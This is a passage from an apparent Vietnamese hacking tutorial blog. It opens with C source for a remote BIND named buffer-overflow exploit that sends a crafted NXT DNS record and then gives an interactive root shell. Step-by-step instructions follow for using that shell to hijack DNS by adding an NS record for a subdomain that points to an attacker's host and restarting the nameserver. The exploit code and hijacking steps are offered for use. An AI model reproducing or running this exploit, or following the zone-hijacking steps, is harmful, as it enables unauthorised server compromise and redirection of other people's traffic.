dnsh = (HEADER *) buf;
dnsh->id = packet->id;
dnsh->qr=1;
dnsh->aa=1;
dnsh->qdcount = htons(1);
dnsh->ancount = htons(1);
dnsh->arcount = htons(1);
dnsh->rcode = 0;
walker=(char*)(dnsh+1);
p=dnssprintflabel(query, (char *)packet, (char*)(packet+1));
query[strlen(query) - 1] = 0;
qtype=*((unsigned short *)p);
printf("%s type=%d\n",query, ntohs(qtype));
/* first, the query */
walker=dnsaddlabel(walker, query);
PUTSHORT(ntohs(qtype), walker);
//PUTSHORT(htons(T_PTR), walker);
PUTSHORT(1,walker);
/* then, our answer */
/* query IN A 1.2.3.4 */
walker=dnsaddlabel(walker, query);
PUTSHORT(T_A, walker);
PUTSHORT(1, walker);
PUTLONG(60*5, walker);
PUTSHORT(4, walker);
sprintf(walker,"%c%c%c%c",1,2,3,4);
walker+=4;
/* finally, we make named do something more interesting */
walker=dnsaddlabel(walker, query);
PUTSHORT(T_NXT, walker);
PUTSHORT(1, walker);
PUTLONG(60*5, walker);
/* the length of one label and our arbitrary data */
PUTSHORT(archlist[arch].length+7, walker);
PUTSHORT(6, walker);
sprintf(walker,"admadm");
walker+=6;
PUTSHORT(0, walker);
make_overflow(walker);
walker+=archlist[arch].length;
PUTSHORT(0, walker);
return walker-buf;
}
#define max(x,y) ((x)>(y)?(x):(y))
int proxyloop(int s)
{
char snd[1024], rcv[1024];
fd_set rset;
int maxfd, n;
sleep(1);
printf("Entering proxyloop..\n");
strcpy(snd, "cd /; uname -a; pwd; id;\n");
write(s, snd, strlen(snd));
for (;;)
{
FD_SET(fileno(stdin), &rset);
FD_SET(s, &rset);
maxfd = max(fileno(stdin), s) + 1;
select(maxfd, &rset, NULL, NULL, NULL);
if (FD_ISSET(fileno(stdin), &rset))
{
bzero(snd, sizeof(snd));
fgets(snd, sizeof(snd) - 2, stdin);
write(s, snd, strlen(snd));
}
if (FD_ISSET(s, &rset))
{
bzero(rcv, sizeof(rcv));
if ((n = read(s, rcv, sizeof(rcv))) == 0)
exit(0);
if (n < 0)
{
return -3;
}
fputs(rcv, stdout);
}
}
return 0;
}
int main(int argc, char **argv)
{
int s, fromlen, res, sl, s2;
struct sockaddr_in sa, from, to;
char buf[16384];
char sendbuf[16384];
unsigned short ts;
int i;
if (argc<2)
{
fprintf(stderr,"Usage: %s architecture [command]\n", argv[0]);
fprintf(stderr,"Available architectures:\n");
i=-1;
while(archlist[++i].id)
fprintf(stderr," %d: %s\n",archlist[i].id,archlist[i].name);
exit(1);
}
arch=atoi(argv[1])-1;
if (argc==3)
command=argv[2];
if ((s=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))==-1)
{
perror("socket");
exit(1);
}
bzero(&sa, sizeof sa);
sa.sin_family=AF_INET;
sa.sin_addr.s_addr=INADDR_ANY;
sa.sin_port=htons(53);
if (bind(s, (struct sockaddr *)&sa, sizeof(sa))==-1)
{
perror("bind");
exit(1);
}
do
{
fromlen=sizeof(from);
if ((res=recvfrom(s, buf, sizeof buf, 0, (struct sockaddr *)&from,
&fromlen)) == -1)
{
perror("recvfrom");
exit(1);
}
printf("Received request from %s:%d for ", inet_ntoa(from.sin_addr),
ntohs(from.sin_port));
sl=form_response((HEADER *)buf,sendbuf);
/* now lets connect to the nameserver */
bzero(&to, sizeof(to));
to.sin_family=AF_INET;
to.sin_addr=from.sin_addr;
to.sin_port=htons(53);
if ((s2=socket(AF_INET, SOCK_STREAM, 0))==-1)
{
perror("socket");
exit(1);
}
if (connect(s2, (struct sockaddr *)&to, sizeof to)==-1)
{
perror("connect");
exit(1);
}
ts=htons(sl);
write(s2,&ts,2);
write(s2,sendbuf,sl);
if (archlist[arch].safe>1)
close(s2);
}
while (archlist[arch].safe>1); /* infinite loop for sparc */
proxyloop(s2);
exit(1);
}Bước 3: với root shell đã có ở bước 2, chúng ta sẽ thay đổi vài dữ liệu tên miền của primary DNS server. Như bạn biết, mỗi primary DNS server sẽ có uy quyền (authoritative) về một domain trên mạng. Để hack DNS server, bạn chỉ việc thêm một bản ghi NS cho sub-domain trong file vùng (zone) và restart lại name server service. Đầu tiên, bạn xác định thư mục của các file vùng. Hãy tìm trong file cấu hình của BIND (/etc/named.conf) dòng có dạng ‘directory "/var/named";’. Thư mục lưu các file vùng là "/var/named". Tìm tiếp trong file name.conf dòng ‘type master;’, dòng 'file' ở phía dưới sẽ cho biết tên file vùng:
Zone "mydomain.com" {
Type master;
File "mydomain.com.zone"
};Đường dẫn đầy đủ của file vùng cần sửa đổi là "/var/named/mydomain.com.zone". Nếu cat file này, bạn sẽ thấy một bản ghi SOA ở đầu file:
@ IN NS NS.UU.mydomain.com.Để thay đổi 'mysubdomain.mydomain.com’ trỏ đến địa chỉ IP của 'attacking.box.com’, bạn hãy thêm vào file vùng này một bản ghi NS như sau:
mysubdomain IN NS attacking.box.com.Nhớ đừng quên dấu '.' ở cuối nha. Bây giờ restart lại server bằng dòng lệnh ‘/usr/sbin/ndc restart’ là xong!
Bạn thử thẩm vấn DNS trên target vừa bị hack xem sao!
$nslookup
>server <target>
>www.mysubdomain.mydomain.com
0 nhận xét:
Đăng nhận xét